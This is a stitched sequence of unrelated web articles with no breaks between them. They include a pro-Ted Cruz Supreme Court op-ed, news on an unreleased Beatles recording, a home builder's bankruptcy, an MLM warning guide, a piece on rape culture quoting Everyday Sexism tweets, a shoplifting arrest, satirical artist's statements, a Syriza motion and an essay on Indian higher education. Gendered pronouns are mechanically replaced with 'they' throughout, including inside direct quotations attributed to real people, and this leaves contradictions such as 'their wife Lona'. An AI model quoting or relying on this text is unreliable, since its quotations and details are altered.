Speculation was that Cruz might be offered the slot as attorney general, now offered to Alabama Sen. Jeff Sessions. Well, Ted, if you want to put strict constitutionalist judges on the Supreme Court who would restore the original intent of the founding fathers, who would be a better pick than yourself?
Trump warned during the campaign that the Second Amendment was under attack and there was no better defender of the Second Amendment than Ted Cruz. They would be a worthy replacement for the late Justice Scalia, with whom Ted Cruz helped save the Second Amendment in the momentous Heller decision. In a statement on Scalia's passing, Cruz stated:
“As liberals and conservatives alike would agree, through their powerful and persuasive opinions, Justice Scalia fundamentally changed how courts interpret the Constitution and statutes, returning the focus to the original meaning of the text after decades of judicial activism. And they authored some of the most important decisions ever, including District of Columbia v. Heller, which recognized our fundamental right under the Second Amendment to keep and bear arms. They were an unrelenting defender of religious liberty, free speech, federalism, the constitutional separation of powers, and private property rights. All liberty-loving Americans should be in mourning.
What few people know, and the media won't remind them, is that Ted Cruz was a prime mover in getting Heller, in which Scalia wrote the majority opinion, before the Court and decided in favor of gun rights, ruling that the right to keep and bear arms was an individual right and that the word “militia”, as the Founders intended, meant the “whole people” of the United States. If Heller had gone the other way, our gun rights would have been thrown on the ash heap of history. In January Cruz told CNN:
I represented 31 states in the Heller case, which upheld the individual right to keep and bear arms. You know what Barack Obama's position is? That there is no individual right to keep and bear arms whatsoever under the Constitution… Hillary Clinton, for example, has said they will put Supreme Court justices on the court who will overturn Heller. And if Heller is overturned… there were four justices who said that there is no individual right to keep and bear arms whatsoever, that it is only a collective right in the militia, which is fancy lawyer talk for a nonexistent right… [If] Hillary Clinton gets one more Supreme Court justice, what it would mean is, the Supreme Court would say you and I and every individual American have no constitutional right under the Second Amendment at all, and either the federal government or a state government could make it a crime to possess a firearm.
Before endorsing Trump, and perhaps one of the reasons aside from SCOTUS picks, Cruz received support from Trump in fighting the Obama administration's Internet giveaway that removed it from U.S. control. They are more in agreement than some commentators think. As Politico reported:
Donald Trump's campaign Wednesday criticized the Obama administration's plan to hand oversight of the internet's domain name system to an international body, echoing Sen. Ted Cruz's argument that it could lead to more censorship by countries like Russia and China. "The U.S. should not turn control of the Internet over to the United Nations and the international community. President Obama intends to do so on their own authority -- just 10 days from now, on October 1st, unless Congress acts quickly to stop him," Trump's national policy director, Stephen Miller, said in a statement published on the campaign's website… Cruz, who has famously refused to endorse Trump's candidacy, thanked the GOP nominee in a tweet: "Appreciate @realDonaldTrump's support of our efforts to stop Obama's Internet handover & keep the #Internet free."
There are those who suggest Cruz would turn down a SCOTUS offer and that in any event they might have a tough time getting confirmed by fellow senators whose toes they have stepped on. But if they are as unpopular as they say, they just might want to elevate them out of the Senate. Cruz, the argument goes, may not want to be just 1 of 9, but right now they are just 1 of 100. Would they pass up a chance to safeguard the Constitution or a generation or more in favor of having their bills die in committee? I think not. Would the United States and the Constitution be better off with a Justice Cruz? I think so.
Daniel John Sobieski is a freelance writer whose pieces have appeared in Investor's Business Daily, Human Events, Reason Magazine and the Chicago Sun-Times among other publications.
Fans are calling the find 'the holy grail'
A previously unreleased version of The Beatles‘ ‘Revolution 1' has found its way online.
The recording, which is supposedly ‘Take 20' of the song, is available to listen to via a YouTube link below.
‘Take 20' of the song is notable, as it appears to bridge the gap between The Beatles‘ ‘Revolution 1' and ‘Revolution 9'.
The main difference in the ‘new' version of ‘Revolution 1' and the version of the same song that appeared on ‘The Beatles' (commonly known as ‘The White Album') is the track's length. The unreleased version is a full seven minutes longer than its released counterpart.
Lyrically and structure-wise, the song doesn't differ wildly from the released version, although the entire second half of the unreleased version is made up of tape loops, vocal effects and studio trickery – some of which appears to have been sampled by The Beatles for use on their sample-heavy ‘Revolution 9' track, which also appears on ‘The White Album'.
‘Take 20' of the song begins with the band talking in the studio, where John Lennon is heard saying “Take your knickers off and let's go” in a high-pitched voice.
The band then begin playing the song.
Sharethrough (Mobile)
Although ‘Revolution 1 (Take 20)' soon mutates into five minutes of assorted backwards singing and screaming from the band, the drums, guitars and George Harrison‘s vocal of “Om-shooby-do-wop” still remain throughout.
Towards the ten-minute mark, the song breaks down into a barrage of speech and from John Lennon and Yoko Ono.
Blogs across the internet are hosting the song, with some fans hailing it as ‘the holy grail' of unreleased Beatles material.
However, it is yet to be officially confirmed as being authentic.
Listen to ‘Revolution 1 (Take 20)' below.
Close to 80 Mini Cooper owners took to the Beltway Sunday morning in support of wounded veterans.
WASHINGTON – Close to 80 Mini Cooper owners took to the Beltway Sunday morning in support of wounded veterans. The event was organized by the husband-and-wife team of Craig and Lona McVeay, both members of DC Metro Minis.
Craig McVeay says the event gave Mini owners a chance to “enjoy the cars, enjoy the social part. Do something for veterans and so our respects for our veterans.”
Owners donated to take part. “I think they counted 80 cars, and I had over 120 people RSVP,” said Lona McVeay.
Once everyone checked in, Mini enthusiasts from as far away as Norfolk, Va., formed a caravan around the Beltway.
Craig says the money will be given to Operation Second Chance, a DC-area based charity which helps “wounded warriors, families and veterans make the transition from military life to civilian life. ”
Charities such as this are near and dear to the couple, since Craig is retired Navy and their wife Lona is active duty.
This is the fifth year for the event.
Follow @WTOP on Twitter.
The home builder WCI Communities has filed for Chapter 11 bankruptcy protection after failing to obtain financing to stay afloat, its chairperson, Carl C. Icahn, said on Monday.
Mr. Icahn owns about 15 percent of the company, or about six million shares.
On Monday, WCI's stock lost nearly all its value, closing at 2 cents a share after opening at 99 cents. It was a far cry from the $22 a share that Mr. Icahn offered for the company in March 2007; they bought their stake in WCI in early 2007 for about $19 a share.
The company rejected their offer, and took itself off the market. Mr. Icahn was named chairperson after a protracted proxy battle.
At the time they were elected chairperson, Mr. Icahn said: “Despite the rough road ahead, I believe in the long-term value of the company and view the WCI platform as a unique vehicle to take advantage of the current market disarray.”
Photo
The luxury builder, whose business is concentrated in Florida, one of the states the hardest hit by the housing downturn, defaulted on its bank debt on July 29 when its liquidity levels fell below the threshold required by its lenders.
Advertisement Continue reading the main story
“The banks have had enough, and understandably so,” said Vicki Bryan, an analyst with Gimme Credit, a bond research firm.
WCI has $2.18 billion in assets and $1.92 billion in debts, according to its bankruptcy petition.
Its chief executive, Jerry Starkey, will leave the company effective immediately after agreeing with WCI on a “mutually satisfactory severance package” and will be available for consultation, the company said in a statement.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
The former chief operating officer, David L. Fry, was named interim president and chief executive.
Beazer Homes USA is the builder most likely to declare bankruptcy next, Ms. Bryan said. When Beazer reports its third-quarter earnings on Friday, the company will probably reveal such significant write-downs on land that is losing value that it might trip the covenants its banks have set to determine its minimum tangible net worth, they said.
Fallout Equestria was written by kkat and Project Horizons was written by Somber
Credit goes to
and
These are the Seapony sisters Capri and Pisces. They are members of the zodiacs who were normal ponies who lived in their village in galloping gorge.But one day they were attacked by killing joke which turned them into sea ponies. Why is this a bad thing? Well they were a long way from any kind of water and they nearly dried out and died. But they made it to a creek and made their way downstream till they were caught in the Hoofington reservoir. They were caught by the Society and put on display for people to gaze at. Finally Professor Zodiac rescued them saying it was wrong to treat them like this, Just because thy were strange.
Looking to improve your situation by starting your own business?
As you're doing your research you may run across some amazing claims by potential business operations that promise you the ability to work for yourself while selling great products.
The old mantra of “if it is too good to be true, it probably is” should raise a red flag in your head.
When an individual or business claims they're going to make everyone rich and successful, you are probably speaking to someone involved in an MLM business scam.
What is a MLM Business?
MLM stands for “multi-level marketing”.
In an MLM business the business owner (usually called a distributor) is compensated not only with commission on their own sales, but also on the sales of people they recruit “down line”.
For example, I start a diet video program MLM business. I sell videos for $50 and earn a $10 commission for each sale. However, I also earn $5 in commission for every sale that a person I recruit to the business makes. I could sell one video and make $10, or recruit one person to sell two videos and earn the same commission.
In some MLM businesses there are more than one tier below you — that is, you get commission for the sales of people who were recruited by the people you recruited.
MLM businesses are often pitched as direct sales or network marketing businesses. The former because you are direct selling the product and the latter because it helps to have a massive network to recruit to join in on the business (earning you more commission).
What You Need to Know About Multi-Level Marketing
All in all, this leads to the MLM distributor making grandiose claims about the product and the ability to work for yourself through the business to get you interested.
Instead of focusing on just the product, the MLM distributor wants you to buy the product and become a distributor. You will usually be invited to come to a conference at a local hotel where the higher level distributors (sometimes called diamonds) come in to pitch the product and get everyone emotionally excited about where this magnificent new business can take them.
Difficult to Track or Verify Claims
Another thing with MLM schemes is it will be difficult if not impossible to verify some of the claims made by whoever is trying to sell you into becoming a distributor. The sales chain and how profits are generated is difficult to understand.
Contrast that with a real business distributor relationship where it is pretty basic to see how you generate profits. Sell X products at Y profit, earn Z income. Sell more of X, make more Z.
Instead, MLM believers like to make claims about how much money they're making, but they will never verify the claims. When you start to break down the math on how much product they would have to be selling in order to hit that income, it quickly becomes apparent that isn't happening.
Distributors are Users
Many times the MLM business will require their distributors to purchase a certain amount of product themselves. It can be used as designed or used as freebies to give away to potential recruits — but you're still spending your hard earned money in order to promote the business. (And in the meantime, not generating any profit from the business while you “ramp up”.)
Contrast that to a real business that doesn't necessarily care if you use the product or not, and won't require you to buy a certain amount every month or year. They just want you to sell their product as much as possible.
Are All MLM Businesses a Scam?
This is always tough because you don't want to paint with such a wide brush to not allow any exceptions.
However, if the business is all about recruiting more people to be in the business… you're probably looking at a scam. Sure, there may be some small profit to be made selling to end users, but any time there is a recruitment aspect to the business I get wary.
Even some of the popular “work from home” or “work for yourself” businesses are under fire. There are quite a few popular MLMs that ex-distributors and bloggers have started writing about to expose the truth. Pink Truth talks about Mary Kay, and Lazy Man and Money has taken on several MLMs including Protandim.
Final Thoughts
Keep your wits about you.
If something sounds too good to be true, it probably is. Ask someone pitching you an MLM to verify the claims they are making; never take anyone in business at their word.
And if you are required to buy a certain amount of product each month or recruit more distributors to the business… I would recommend finding something else to do with your time.
Have you ever dealt with a MLM? How was your experience?
We live in a world where sexual assault can be dismissed with jokes or excuses, even used in a chatup line or plastered across a T-shirt. The UK rape statistics are shocking, and so are these harrowing reports to the Everyday Sexism Project
This is rape culture – and look at the damage it does
What do we mean when we say “rape culture”? You may have heard the term used recently. It describes a culture in which rape and sexual assault are common (in the UK over 85,000 women are raped and 400,000 sexually assaulted every single year). It describes a culture in which dominant social norms belittle, dismiss, joke about or even seem to condone rape and sexual assault. It describes a culture in which the normalisation of rape and sexual assault are so great that often victims are blamed, either implicitly or explicitly, when these crimes are committed against them. A culture in which other factors such as media objectification make it easier to see women as dehumanised objects for male sexual purposes alone.
It's part of rape culture when “I'm feeling rapey” T-shirts are put up for sale on eBay. Or when a member of a University sports team goes out in a “casual rape” shirt, or another team plays a game called: “It's not rape if …”
It's part of rape culture when a child victim of sexual abuse is accused of being complicit and somehow “egging” on their abuser in the court case against him. It's rape culture that makes it so hard for male victims to speak out too, because hand-in-hand with the dismissal of rape as a hilarious joke goes the stigmatisation of male rape victims as effeminate, impotent or non-existent.
Sometimes it's hard to recognise or understand rape culture without hearing real-life examples of how it impacts on everyday lives, starting from an incredibly young age:
Jill Nicholls (@NichollsJill) @EverydaySexism #followed home from primary school by gang of boys saying they'd rape me - didn't know what it meant but was scared - ran
Tasha Berg (@TashaHugs) @EverydaySexism Overheard young boy on bus saying - "I'll rape your mum so bad they can't walk". Sickening!
It means that the discussion and threat of rape becomes an acceptable part of public discourse:
Shruti Sardesai (@ShrutiSardesai) @EverydaySexism Can't go out for walks around my house bc routinely harassed, called names, and told that I need to be raped. Lovely stuff.
Anna Porretta (@Little_Terrors) @EverydaySexism My coworker was walking me to my car after my closing shift, I thanked them and they laughed & said they could rape me right now.
And the idea of rape becomes fair game for public jokes:
Angela Barnes (@Angela_Barnesy) Genuine chat up scene unfolding on this train: Boy: do you have a rape alarm? Girl: yes Boy: shame I despair for humanity. @EverydaySexism
Rape culture suggests that men have a ‘right' to women's bodies, thus undermining the concept of consent:
Storm Emily (@TheUrbanDryad) @EverydaySexism Guy I used to go out with decides they want to restart stuff between us. When I decline they threaten to rape me #ShoutingBack
This leads to common misconceptions about women “asking for it” or “wanting it”, even if they explicitly say otherwise:
Chocoholic Girl (@chazzyb31) @EverydaySexism At a party with bf, met their friend & pregnant gf. Friend follows me into toilets & says he's going to rape me bcs I want it.
♀☭Tw¡nk Sl¡thersby☭♀ (@Twinklecrepe) @EverydaySexism I was raped by a coworker. I told my boss about it; they said it wasn't rape and implied I actually wanted it
This leads to public speculation about whether victims' dress or behaviour could be to blame for their own assaults:
elin who (@therosetylah) @EverydaySexism two girls in my class were talking about how you'd only have yourself to blame for getting raped if you wore a short skirt
Catherine (@Scathach_81) @EverydaySexism A former magistrate blames short skirts for rape on #bbctbq Welcome to 21st century Britain. #VictimBlaming
Wolf Mommy (@Wolf_Mommy) When a man told me breastfeeding my baby in public is going to get me raped. @EverydaySexism
This shifts all the focus onto victims, while perpetrators are not addressed at all:
The Family Buisness (@Sarah_Watsons) @EverydaySexism ever since I was little my mum told me how to not get raped but I have never heard them once tell my 2 brothers not to rape.
Rape culture can permeate every area of a woman's life, from the pavement:
Katie McArthur (@grrumblecakes) And FURIOUS that there are people alive who think threatening to rape me on my way to work is a funny joke #everydaysexism
To the workplace:
AM (@adorrissey) @EverydaySexism upon hearing I was 19 and a virgin, my coworker suggested I "needed to get raped."
From the classroom:
Ellen Steenkamp (@EllenSteenkamp) @EverydaySexism At age 11 classmates on schooltrip stated that 'no-one would rape me anyway cuz I'm too ugly'. Others only laughed at that
To our own homes and families:
honey-senpai (@kawaiifriend) @EverydaySexism bought an open back t shirt for a concert a month ago; my father told me the shirt screamed "rape me"
As the word starts to lose its meaning, it becomes harder and harder to object to rape culture:
Charlie Price (@charliecat82) @EverydaySexism #LadCulture being told by an ex-boyfriend that he'd like to rape me and then they didn't get why I was angry.
Worst of all, the widespread and normalised nature of rape culture makes it increasingly hard for victims to speak out, as they learn to believe they won't be taken seriously, or are dismissed when they do:
Amanda Tall (@AmandaLDTall) On a nearly empty metro 4 men shouted they wanted to rape me. Scary but we're not meant to make a fuss so didn't tell anyone @EverydaySexism
Lorg Mo Chearta (@BriMonroeCarter) @EverydaySexism I was 15 & my rape happened at a party. Never reported it because I knew I would get blamed&no would believe me. #RapeIsRape
Chitra Nagarajan (@chitranagarajan) #ididnotreport because I thought I was overreacting - when being followed by groups of men and threatened with rape
Vidyut (@Vidyut) the usual. RT @THELOUDERMOUTH: @EverydaySexism When I told friends I was raped, they said I 'should have been more careful.' #shoutingback
The cycle is perpetuated as victims are silenced and blamed, the crime normalised, and perpetrators completely ignored.
This is rape culture.
As a "nerdy, Mexican, gay, Mormon child of the '80s and '90s," cartoonist Terry Blas had trouble figuring out their identity… until an experience in New York taught them a valuable lesson.
Advertisement
Advertisement
Terry Blas is the mind behind the ongoing web series "Briar Hollow" and the mini comic, You Say Latino.  They are the illustrator for Mama Tits Saves the World from Northwest Press. Their cover work includes: Regular Show, The Amazing World of Gumball, Adventure Time, and Rick and Morty. Their latest project with Oni Press is a fat camp murder mystery called Morbid Obesity.You can find more of their work on their website, Tumblr, Twitter, and Instagram.
Advertisement
Graphic Culture home | Previous
Follow Graphic Culture: Twitter | Facebook | Instagram
Terry Blas is the mind behind the ongoing web series Briar Hollow
and the mini comic, You Say Latino.  They are the illustrator for Mama Tits Saves the World from Northwest Press. Their cover work includes: Regular Show, The Amazing World of Gumball, Adventure Time, and Rick and Morty. Their latest project with Oni Press is, a fat camp murder mystery called Morbid Obesity.
SANTA ANA – A 37-year-old homeless woman was arrested Monday night after they threatened sporting-goods store employees with a field hockey stick and paintball grenade while wearing a hockey mask.
Police said they were upset because they were not allowed to leave with two carts of merchandise without paying.
Michele Renee Lara began shopping around 6:30 p.m. at the Sports Authority, 3900 South Bristol St., and spent about three hours filling two shopping carts with various types of sporting goods merchandise, Cmdr. Jeffrey Smith of the Santa Ana Police Department said.
Lara reportedly also began wearing some of the merchandise and stuffed goods into backpacks that they also put inside the two shopping carts.
Around 9:30 p.m., Lara attempted to leave the store without paying for the merchandise, Smith said.
Officials said several employees stopped them from leaving, which prompted them to run to the back of the store, put on a hockey mask and grab a field hockey stick, which they used to threaten employees.
“She also grabs a paintball grenade, lobs it at the employees, and it doesn't do anything,” Smith said.
The paintball grenade did not explode and employees were not hit with the stick, but when Lara's efforts failed to get them out of the building, they ran again to the back of the store and got on a bicycle, Smith said.
Lara attempted to ride the bike out of the store, but crashed before they could make it to the door.
Santa Ana police arrived and arrested Lara on suspicion of robbery, because “she tried to use fear or force to try to leave the store,” Smith said.
No employees were injured in the incident.
Lara was booked into Orange County jail where they were held in lieu of $50,000 bail. They were scheduled to appear in court Wednesday, according to jail records.
Contact the writer: 714-796-7802 or aduranty@ocregister.com
To be successful as an artist in this day and age it is crucial that you justify your work as being contemporary. To be "contemporary" your work needs to be explained and justified in the language of postmodern theory. As works of art have evolved to require less skill in their making, artists have been become increasingly reliant on intellectual pedigrees substantiated by theory. Five hundred years ago, this wasn't a concern.
In fact, it strikes me that without the right kind of theoretical writing to validate their work many of the great artists of the past would be in real trouble in today's art world: can you get into an MFA program or a decent gallery without an artist's statement? I doubt it.
An Old Master working today would definitely need some strong postmodern language to support his/her "artistic practice." Here are some samples of the kinds of "Artist's Statements" that I think would be required of European Old Masters if they tried to get a show in New York or Los Angeles today.
Artist's Statements of the Old Masters
Juan Sánchez Cotán, Quince, Cabbage, Melon and Cucumber, 1602
The San Diego Museum of Art
"My work explores the temporal duality of objects/non-objects in a hegemonic space/non-space. Indeed, my fruit and vegetable simulacra juxtaposes pre-Marxist male/female homo/heterosocial redactions of materiality through recurring formal concerns."
-Juan Sánchez Cotán
Jean-Honore Fragonard, The Bathers, c. 1765, The Louvre
"By disrupting the implied heteronormative discourse of antediluvian mythology, my paintings imply a personal mythopoeic narrative that both transcends and embodies the male gaze. By investigating the callipygian forms of a complex homosocial nexus in an anti-Lacanian context I depict a multitude of redundant, overlapping and coded tasks and roles."
- Jean-Honore Fragonard
Michelangelo Buonarroti, The Rebellious Slave, The Louvre, 1513
"The pre-homoeroticized body forms both my field of action and the basis of my conceptual taxonomy. My sculptures explore both the flux of transfixable signifiers and their complimentary anecdotal formations. My choice of Carrara marble as a medium creates a dialectic between proto-Classical conceptions of idealized form and later Humanistic naturalism. Each figure's physical struggle is simultaneously inoperative and adjectival."
-Michelangelo Buonarroti
Hieronymus Bosch, detail of The Garden of Earthly Delights, c.1500, The Prado
"An implied quasi-theatrical sublimity in my work creates a tension between modes of engagement with internal and external realities. While attempting to bridge a rift in the continuum between metaphysics and narrativity I investigate a lexicon of parafictional erotic proclivities."
- Hieronymus Bosch
Titian, The Venus of Urbino, 1538, The Uffizi Gallery
"Woman, goddess, subject, object and signifier: Venus activates both the Utopian and Dystopian spaces of the Venetian Palazzo. By inducing an affirmative valence of feminine/objective lucidity Venus poses a question: has our tendency to privatize desire further affirmed or disenfranchised their archetypal significance?"
- Tiziano Vecellio
Diego Velázquez, Las Meninas, 1639, The Prado
"In addressing the collapse of personal autonomy and identity in an authoritarian/monarchist space I imply a multiplicity of didactic constructions and formations. By investigating the formal and informal withdrawal of the central and objective role of the "subject" I address and investigate the role of signifiers and their ontological suggestions. I also reverse and subjugate the traditional symbol of the dog ("Fido") into a subject/object reflection of the hierarchical and appropriated role of the artist in a Catholic/Baroque social construct."
- Diego Rodríguez de Silva y Velázquez
Rembrandt Van Rijn, Self-portrait with Beret and Turned-up Collar, 1659
The National Gallery of Art, Washington, D.C.
"Life etches itself onto our faces as we grow older, showing our violence, excesses or kindnesses."
- Rembrandt Van Rijn
OK: I had to slip that in there.
That is what an actual artist's statement sounds like...
Last weekend the Central Committee of Syriza met. Opposition to the party's Majority line on the agreement with the Eurogroup was strong. A critical amendment by the Left Platform, the main opposition group led by the Minister Panayotis Lafazanis, won 68 votes, 41% of the total.
Even the new party secretary, Tassos Koronakis, was elected by a small margin of 102 votes out of 199. As the Greek newspaper, ToVima, explained, the Central Committee “has sent a signal to the government”.
Stamatis Karagiannopoulos, of the Communist Tendency, intervened in the debate and presented the Tendency's resolution. The Communist Tendency gave critical support to the amendment of the Left Platform. Here, we make Stamatis Karagiannopoulos's intervention available for our readers.
---
Stamatis Karagiannopoulos's intervention at the SYRIZA Central Committee, and the resolution they submitted on behalf of the Communist Tendency of SYRIZA
Fellow comrades,
The position of the Communist Tendency on the agreement and the recent developments is well known.
Faced with developments of such a nature, the point of any inner-party discussion is for its members to assess which political views within the party had warned the party well in advance about such developments. In that respect, every well-meaning left activist would have no trouble to accept that all the key warnings on the part of the Communist Tendency towards the party leadership over the last two years have entirely been borne out by events.
Comrades of the leadership, over recent years we have been pointing out that it would be a mistake to adopt negotiating tactics as a method of overturning austerity and the Memoranda. Your dogmatic fixation on negotiations has necessarily led you today to regard the implementation of the SYRIZA programme as a “unilateral action” (NB one that is prohibited under the recent agreement). Over recent years we have been asking you, comrades of the leadership, not to recognise the debt and the obligations to service it. Now, you have been brought to such a position that you publicly refer to the debt as “viable” and have been forced to accept “primary surplus” limitations to implementing your programme. On the basis of the rotten state of the capitalist economy [in crisis], the imposition of “primary surplus” targets would inevitably lead you to new austerity measures and to the total abandonment of the election commitments.
Comrades of the leadership, we have been warning you against taking any position on the false dilemma of the “the euro vs. the drachma”, given that the actual fundamental dilemma for the workers is none other than “capitalism or socialism”. By dogmatically insisting on Greece's participation in the Eurozone at all costs, you are now forced to accept the extortions of the masters of the Eurozone.
Comrades of the party leadership, we have been advising you to complement the Thessaloniki programme with a series of radical and socialist measures – such as the repudiation of the debt, the nationalisation of church property, and the nationalisation of the largest companies, initially the most profitable ones – in order to finance the programme. However, you preferred to regard as “realistic” the possibility that this programme could be financed by the EU and the Troika itself.
Your own fear of assuming the necessary radical and socialist measures has now disarmed you and has restricted you to having to comply with the suffocating restraints of the current memoranda-imposed budget, and to postpone to some undefined moment in the future even that very modest Thessaloniki programme.
Comrades of the party leadership, despite the seriousness of your initial compromise, you still have time to salvage this situation by changing direction and assuming the necessary radical and socialist policies.
At present, you have a further reason to do so. It is likely that your tactics of retreat would force you to bring the agreement for a vote in parliament only to find SYRIZA governing in practice not just with the reactionary ANEL but also with New Democracy, the Potami party and PASOK. The stakes therefore are too high for the party and the Central Committee to unconditionally have confidence in a government that has reneged on fundamental commitments. Therefore, for this reason, the Communist Tendency of SYRIZA proposes that the Central Committee uphold the content of the following brief motion:
Motion submitted to the SYRIZA Central Committee
The SYRIZA Central Committee reaffirms its support for the electoral commitments of the party and its founding political and programmatic principles. It calls upon the government to immediately cancel the Memorandum agreement reached with our creditors and calls on our MPs to vote against the agreement,, should it come before parliament for its approval. The Programme of SYRIZA which enjoys the mass support of the Greek people who voted for and support it, must be fully implemented without seeking the approval of our creditors.
The Communist Tendency disagreed with the proposed political decision of SYRIZA's Political Bureau. Despite our disagreement with the Left Platform's choice to submit an amendment to the Political Bureau's proposal – rather than to submit a self-standing alternative document – we critically supported the amendment it submitted (accessible here).
The motion presented by the Communist Tendency to the Central Committee will also be submitted over the coming period to those SYRIZA local branches where it is present.
I recently read an article on the Kafila blog—more like an angry, reflective rant—written by some students from St. Stephen's College in Delhi. To quickly summarize, the piece criticized the draconian views of the principal of St. Stephen's College regarding curfews on women's dormitories and their stymieing of their students' democratic ideals of discussion, protest, and open criticism. More broadly, though, the article's writers seemed to be speaking about the larger stagnant institution of Indian higher education, overseen by a class of rigid administrators represented by this sexist and bigoted principal, as described by the students. The students' frustration was palpable in the text and their story felt to me like a perfect example of what happens when an unstoppable force meets an immovable object. Except Indian students are not an unstoppable force. Not even close.
In 2007, I was a student at St. Stephen's College for seven months as part of a study abroad program offered by my home institution, Brown University. In as many ways as possible, I tried to become a Stephanian: I joined the football (soccer) team, acted in a school play written and directed by an Indian peer, performed in the school talent show, was a member of the Honors Economics Society, and went to several student events on and off campus. More importantly, though, I was a frequenter of the school's cafe and enjoyed endless chai and butter toasts with my Indian peers under the monotonous relief of the fans spinning overhead. Most of my friends were third years, like me, and all of them were obviously very bright. I was curious about their plans after they graduated. With only a few exceptions, they were planning on pursuing second undergraduate degrees at foreign universities.
“Wait, what?! You are studying here for three years just so you can go do it again for four more years?” I could not grasp the logic of this.
What changed my understanding was when I started taking classes at St. Stephen's College. Except for one, they were horrible.
This was not an isolated incident—all my fellow exchange students (six from Brown University and even more from Rutgers University in the next apartment block) concurred that the academics were a joke compared to what we were used to backing home. In one economic history class the professor would enter the room, take attendance, open their notebook, and begin reading. They would read their notes word for word while we, their students, copied these notes word for word until the bell sounded. Next class they would find the spot where the bell had interrupted him, like a storyteller reading to children and trying to recall where they had last put down the story. They would even pause slightly at the end of a long sentence to give us enough time to finish writing before they moved on. And this was only when they decided to show up—many times I arrived on campus to find class abruptly canceled. Classmates exchanged cell phone numbers and created phone trees just to circulate word of a canceled class. I got a text almost daily about one of my classes. My foreign peers had many similar experiences.
I would sit in class and think to myself, “Can you just photocopy your notebook and give me the notes so I can spend my time doing something less completely useless?” I refused to participate. Instead, I sat at my desk writing letters to friends.
If it were not for the fact that attendance counted towards my marks, I would have never showed up at all. There was no need. I calculated the minimum attendance required not to fail, hit that target square on, and still got excellent grades. In one political science class, the only requirements for the entire period between August and December were two papers, each 2,500 words. I wrote more intense papers in my US public high school in a month. Readings were required but how can this be enforced when there is no discussion that makes students accountable for coming to class prepared? The only questions I heard asked during my classes were about whether the material being covered that day would be on the exam. Remember, this is not any regular liberal arts college—St. Stephen's College is regarded as one of, if not the best, college in India.
The best learning experience I had was hundreds of miles from campus with four other students and one professor on a trek to Kedarnath during October break . We had multi-day conversations spanning morality, faith, and history. During one memorable overnight bus ride, our professor told us the entire Mahabharata epic from memory while we leaned over seats or squatted in the aisle to be closer to the campfire of their voice while the rest of the bus dozed around us. The thirst in these students was there and this professor exemplified passionate teaching.
But the system is broken. Bearing in mind the richness of India's intellectual tradition, my entire study abroad experience in India, from an academic standpoint, was an enormous disappointment.
To pause for a moment, here is the problem with me talking about this topic: right now many Indians reading this are starting to feel defensive. “Nationalist” is a term I have heard as a self-description as they defend Mother India from the bigoted, criticizing foreigner. They focus on me rather than the problem. I have had people de-friend me on Facebook and walk out on meals because I politely expressed an opinion on politics or history that went against the publicly consented “Indian opinion.”
For a nation that prides itself on the 17 languages printed on its currency, I am greeted with remarkable intolerance. Even after living in India for close to three years, attending an Indian college, working for an Indian company, founding an Indian company, paying taxes in India, and making India my home, I am not Indian enough to speak my mind. But in a nation that rivals all others in the breadth of its human diversity, who is Indian enough? Because if loyalty and a feeling of patriotism were the barometers for “Indianness,” rather than skin color or a government document, then I would easily be a dual US-Indian citizen. This Indian defensiveness is false nationalism. It is not a stance that cares about India, it is one that cares about what others think of India, which is not nationalism. That is narcissism.
My voice should be drowned out by the millions around me who are disappointed with how they have been short-changed by the Indian government—their government. Education is one of the most poignant examples of this and serves as great dinner conversation amongst the elite: “The Indian education system is lost in the past and failing India.” Everyone at the table nods, mumbles their concurrence, and cites the most recent Economist article or PricewaterhouseCooper study on the matter in order to masquerade as informed.
“Yes, how sad.”
“Yes, how terrible.”
“Yes, India must fix this.”
Yet among my fellow Indian education alumni I mostly hear a deafening silence when it comes to action. What is remarkable is that all students in India know what I am talking about. They know and are coping: Indian students are taking their useless Indian liberal arts degrees and going abroad to get real ones that signify a real education. A real education being one that challenges the intellect and questions paradigms, not one of rote memorization and conformity. Or, as was the case with my Indian friends at Brown, they skip India altogether. Sure, I took some unimpressive classes at Brown and no curriculum is perfect, but Indian students should be demanding more. Much more.
The article I read by the Stephenian students was a step, but too little of one and in the wrong direction. Dorm curfews? The students of St. Stephen's College need to dig deeper and question why they are in those dorms in the first place. Griping about the loss of their democratic rights in school? Wake up: Students have no recognized rights. If they did, then their right to an education would be respected, but the status quo says otherwise. How dare they discuss it, says the system.
To provide another anecdote, I used to interview Indian students applying to Brown University. While the admissions office says this forms a small component of the application relative to other factors like grades, activities, test scores, and essays, they nevertheless like to arrange an alumni interview whenever they can. The purpose is to be conversational and get a sense for the human who is obscured by the very impersonal scores and grades; it is not meant to be an interrogation. The applicant is also encouraged to ask me questions and learn more about Brown. In all the interviews I did, only one applicant truly inspired me to write a glowing review of our encounter. Similarly, I constantly get asked by Indian parents what the secret is to getting in to schools like Brown. I have even been hired by a few parents to consult for them and assist their son or daughter in the application process.
What consistently struck me about these students was their (and their parents') cookie cutter attempts to craft the perfect applicant. That in itself was not remarkable—high school students all over the US do this—but what I found different was the lack of depth. The students spent hours at tutorials to ace board exams and maybe had an activity outside of the classroom here and there, but there was nothing, except in that one outstanding student, that provided an outlet for their personality to shine through. I particularly focused on helping the students with their essays (I never wrote for them, only edited) and coaxed them to describe why they had done some activity or loved some class. Dead stares and long telephone pauses ensued. There seemed to be no spark—no inquisitive magnetism pulling them towards exploring the unknown. I was teleported back to the economic history class I took at St. Stephen's and I felt like the professor: these students would look up from their notebooks at me and want to know what to copy next. These students were adapting to be seen as the best within a broken system—it was an overwhelmingly depressing epiphany.
In my opinion, the students of India have two choices: either let the government sort itself out or take ownership of the problem themselves. Mass protest against the inertia of regressive forces is an atavistic trait in young Indians. Indeed, modern India was born out of such actions. Moreover, many of the cultural revolutions throughout history have had students waving the banners. What I find inspiring about St. Stephen's students writing the article I referenced at the beginning is that they have the most to lose in this fight and are starting to fight anyway.
